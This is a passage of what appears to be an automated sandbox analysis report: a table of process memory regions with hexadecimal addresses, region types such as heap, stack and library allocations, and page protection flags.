trusted library allocation
|
page read and write
|
||
|
1B41176E000
|
heap
|
page read and write
|
||
|
1B4137AD000
|
heap
|
page read and write
|
||
|
1B4137D3000
|
heap
|
page read and write
|
||
|
1B4136C0000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
1B4135E1000
|
heap
|
page read and write
|
||
|
1B4136BC000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
1B4136EA000
|
heap
|
page read and write
|
||
|
1B4135F8000
|
heap
|
page read and write
|
||
|
1B4137E3000
|
heap
|
page read and write
|
||
|
1B41355D000
|
heap
|
page read and write
|
||
|
1B413597000
|
heap
|
page read and write
|
||
|
1B413B70000
|
remote allocation
|
page read and write
|
||
|
1B413708000
|
heap
|
page read and write
|
||
|
2B842D30000
|
heap
|
page read and write
|
||
|
1B41185D000
|
heap
|
page read and write
|
||
|
1B413557000
|
heap
|
page read and write
|
||
|
1B4139BF000
|
heap
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
2B828B10000
|
trusted library allocation
|
page read and write
|
||
|
1B413AC9000
|
heap
|
page read and write
|
||
|
2B82A54E000
|
heap
|
page read and write
|
||
|
1B413ACB000
|
heap
|
page read and write
|
||
|
1B4135B9000
|
heap
|
page read and write
|
||
|
1B41379D000
|
heap
|
page read and write
|
||
|
1B4137B7000
|
heap
|
page read and write
|
||
|
1B413602000
|
heap
|
page read and write
|
||
|
1B413761000
|
heap
|
page read and write
|
||
|
DAA8AFE000
|
stack
|
page read and write
|
||
|
41FF3FF000
|
stack
|
page read and write
|
||
|
1B4137B2000
|
heap
|
page read and write
|
||
|
1B41365F000
|
heap
|
page read and write
|
||
|
1B4137BA000
|
heap
|
page read and write
|
||
|
1B4136D5000
|
heap
|
page read and write
|
||
|
1B4136D5000
|
heap
|
page read and write
|
||
|
1B413953000
|
heap
|
page read and write
|
||
|
1B4135CE000
|
heap
|
page read and write
|
||
|
1B413A34000
|
heap
|
page read and write
|
||
|
1B413750000
|
heap
|
page read and write
|
||
|
2B82C422000
|
trusted library allocation
|
page read and write
|
||
|
1B413560000
|
heap
|
page read and write
|
||
|
2B842990000
|
heap
|
page execute and read and write
|
||
|
1B4139CD000
|
heap
|
page read and write
|
||
|
1B4136C0000
|
heap
|
page read and write
|
||
|
1B413585000
|
heap
|
page read and write
|
||
|
1B4117B5000
|
heap
|
page read and write
|
||
|
1BEBE9D0000
|
heap
|
page read and write
|
||
|
1B4135F5000
|
heap
|
page read and write
|
||
|
2B82A53B000
|
heap
|
page read and write
|
||
|
1B413785000
|
heap
|
page read and write
|
||
|
1B413575000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4136BC000
|
heap
|
page read and write
|
||
|
1B4136D8000
|
heap
|
page read and write
|
||
|
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4136B0000
|
heap
|
page read and write
|
||
|
1B4136F0000
|
heap
|
page read and write
|
||
|
1B41357B000
|
heap
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
1B413754000
|
heap
|
page read and write
|
||
|
1B413AD4000
|
heap
|
page read and write
|
||
|
1B41358F000
|
heap
|
page read and write
|
||
|
1B4139C4000
|
heap
|
page read and write
|
||
|
79878FC000
|
stack
|
page read and write
|
||
|
1B41376C000
|
heap
|
page read and write
|
||
|
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
|
1B4136DB000
|
heap
|
page read and write
|
||
|
1B411862000
|
heap
|
page read and write
|
||
|
1B4136EA000
|
heap
|
page read and write
|
||
|
1B4135D7000
|
heap
|
page read and write
|
||
|
79872FE000
|
stack
|
page read and write
|
||
|
2B842B08000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
1B413807000
|
heap
|
page read and write
|
||
|
1B4139D4000
|
heap
|
page read and write
|
||
|
1B413562000
|
heap
|
page read and write
|
||
|
1B413561000
|
heap
|
page read and write
|
||
|
1B4136D5000
|
heap
|
page read and write
|
||
|
1B413C42000
|
heap
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
1B4135DC000
|
heap
|
page read and write
|
||
|
1B4139AD000
|
heap
|
page read and write
|
||
|
DAA871D000
|
stack
|
page read and write
|
||
|
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
|
1B4136EA000
|
heap
|
page read and write
|
||
|
1B4136D5000
|
heap
|
page read and write
|
||
|
2B82A460000
|
heap
|
page read and write
|
||
|
1B411760000
|
heap
|
page read and write
|
||
|
1B41357E000
|
heap
|
page read and write
|
||
|
2B82A523000
|
heap
|
page read and write
|
||
|
2B828A90000
|
heap
|
page readonly
|
||
|
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
|
1B4138FA000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
1B4136D8000
|
heap
|
page read and write
|
||
|
1B4137DE000
|
heap
|
page read and write
|
||
|
1B4135D1000
|
heap
|
page read and write
|
||
|
1B413788000
|
heap
|
page read and write
|
||
|
DAA8BFE000
|
stack
|
page read and write
|
||
|
79876FF000
|
stack
|
page read and write
|
||
|
1B41365F000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
1B411838000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B828A80000
|
trusted library allocation
|
page read and write
|
||
|
DAA8D79000
|
stack
|
page read and write
|
||
|
1B413576000
|
heap
|
page read and write
|
||
|
1B4116B0000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4135F5000
|
heap
|
page read and write
|
||
|
1B4136D5000
|
heap
|
page read and write
|
||
|
1BEBE8A0000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
2B82A450000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
2B8429C0000
|
heap
|
page read and write
|
||
|
1B413771000
|
heap
|
page read and write
|
||
|
1B413803000
|
heap
|
page read and write
|
||
|
2B828B45000
|
heap
|
page read and write
|
||
|
2B842AC9000
|
heap
|
page read and write
|
||
|
1B413589000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
DAA8DF7000
|
stack
|
page read and write
|
||
|
1B413798000
|
heap
|
page read and write
|
||
|
1B4137C3000
|
heap
|
page read and write
|
||
|
1B413747000
|
heap
|
page read and write
|
||
|
2B82C494000
|
trusted library allocation
|
page read and write
|
||
|
2B82A651000
|
trusted library allocation
|
page read and write
|
||
|
DAA8F7E000
|
stack
|
page read and write
|
||
|
2B828865000
|
heap
|
page read and write
|
||
|
2B8289D0000
|
heap
|
page read and write
|
||
|
1B413813000
|
heap
|
page read and write
|
||
|
1B4139E5000
|
heap
|
page read and write
|
||
|
1B4135F8000
|
heap
|
page read and write
|
||
|
1B4137A5000
|
heap
|
page read and write
|
||
|
1B4117B6000
|
heap
|
page read and write
|
||
|
1B4117B0000
|
heap
|
page read and write
|
||
|
1B411857000
|
heap
|
page read and write
|
||
|
1B4136F0000
|
heap
|
page read and write
|
||
|
DAA9C4D000
|
stack
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
DAA9BCF000
|
stack
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
2B82888E000
|
heap
|
page read and write
|
||
|
1B41176E000
|
heap
|
page read and write
|
||
|
2B82A6D6000
|
trusted library allocation
|
page read and write
|
||
|
2B828AD0000
|
trusted library allocation
|
page read and write
|
||
|
1B413593000
|
heap
|
page read and write
|
||
|
1B411864000
|
heap
|
page read and write
|
||
|
1B4135E7000
|
heap
|
page read and write
|
||
|
2B82C457000
|
trusted library allocation
|
page read and write
|
||
|
1B4136C0000
|
heap
|
page read and write
|
There are 437 hidden memdumps, click here to show them.